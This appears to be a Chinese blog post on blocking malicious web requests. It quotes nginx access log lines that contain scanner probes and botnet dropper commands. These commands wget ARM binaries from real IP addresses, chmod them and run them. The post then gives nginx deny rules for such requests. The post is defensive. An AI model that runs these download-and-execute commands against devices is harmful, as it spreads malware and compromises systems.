linux恶意请求

nginx访问日志:

复制代码
162.243.135.29 - - [05/Jan/2024:00:12:07 +0800] "GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 153 "-" "Mozilla/5.0 zgrab/0.x"

107.151.182.54 - - [04/Mar/2024:11:30:06 +0800] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"

5.189.156.66 - - [17/Jun/2024:05:37:42 +0800] "GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+arm4+arm7;nohup+wget+http:/\x5C/45.148.120.144/

107.151.182.62 - - [05/Aug/2024:18:07:14 +0800] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"

41.142.215.70 - - [06/Aug/2024:02:43:27 +0800] "GET /shell20211028.php HTTP/1.1" 404 555 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"

172.168.40.186 - - [08/Aug/2024:20:30:16 +0800] "GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 153 "-" "Mozilla/5.0 zgrab/0.x"

185.224.128.83 - - [11/Aug/2024:00:09:00 +0800] "GET /shell?cd+/tmp;rm+earm+earm5+earm7;nohup+wget+http:/\x5C/154.216.18.103/earm7;chmod+777+earm7;./earm7+jaws;nohup+wget+http:/\x5C/154.216.18.103/earm5;chmod+777+earm5;./earm5+jaws;nohup+wget+http:/\x5C/154.216.18.103/earm;chmod+777+earm;./earm+jaws HTTP/1.1" 301 169 "-" "KrebsOnSecurity"

# nginx配置文件增加
# 详见:https://blog.csdn.net/weixin_46084533/article/details/140662309

location / {
    if ( $arg_cd ) {
        return 403;
    }
}



# 如果上述无效,增加下面配置
# 处理以/autodiscover/autodiscover、/sitecore/shell/sitecore、/shell开头请求
location ~* /(autodiscover/autodiscover|sitecore/shell/sitecore|shell) {
    return 403;
}

# 或者,仅处理/shell?cd、/shell?kill、/shell?killall请求
location ~* /shell {
    if ( $query_string ~* (cd|kill|killall) ) {
        return 403;
    }
}

Linux阻止恶意请求:如何阻止以下访问: "GET /shell?cd+/tmp;rm+arm+arm7;nohup+wget+http:/\/147.78.103.44/arm7;chmod+77_nginx 访问记录中shell cd开头的记录-CSDN博客

KrebsOnSecurity

复制代码
# nginx配置文件增加
# 详见:https://blog.csdn.net/sunsharer/article/details/140776698

location / {
    if ( $http_user_agent ~* KrebsOnSecurity ) {
        return 403;
    }
}

远程代码执行(Remote Code Execution, RCE)攻击案例分析与应对策略-CSDN博客

相关推荐
WilliamHu.17 小时前
Windows 环境下使用 Docker 成功部署 Dify(完整实战记录)
运维·docker·容器
范纹杉想快点毕业17 小时前
嵌入式工程师一年制深度进阶学习计划(纯技术深耕版)
linux·运维·服务器·c语言·数据库·算法
物理与数学17 小时前
Linux 内核 vm_area_struct与vm_struct
linux·linux内核
Wpa.wk17 小时前
持续集成 - 持续集成工具-Jenkins的部署流程
java·运维·经验分享·ci/cd·自动化·jenkins
运维行者_17 小时前
OpManager 对接 ERP 避坑指南,网络自动化提升数据同步效率
运维·服务器·开发语言·网络·microsoft·网络安全·php
步步为营DotNet17 小时前
深入探究.NET中Stream:灵活高效的数据流处理核心
服务器·数据库·.net
txinyu的博客17 小时前
sprintf & snprintf
linux·运维·算法
萤丰信息17 小时前
智慧园区:科技赋能的未来产业生态新载体
大数据·运维·人工智能·科技·智慧园区
阿杰 AJie17 小时前
Nginx配置静态资源服务器
运维·服务器·nginx
EverydayJoy^v^17 小时前
RH124简单知识点——第2章——调度未来任务
linux·运维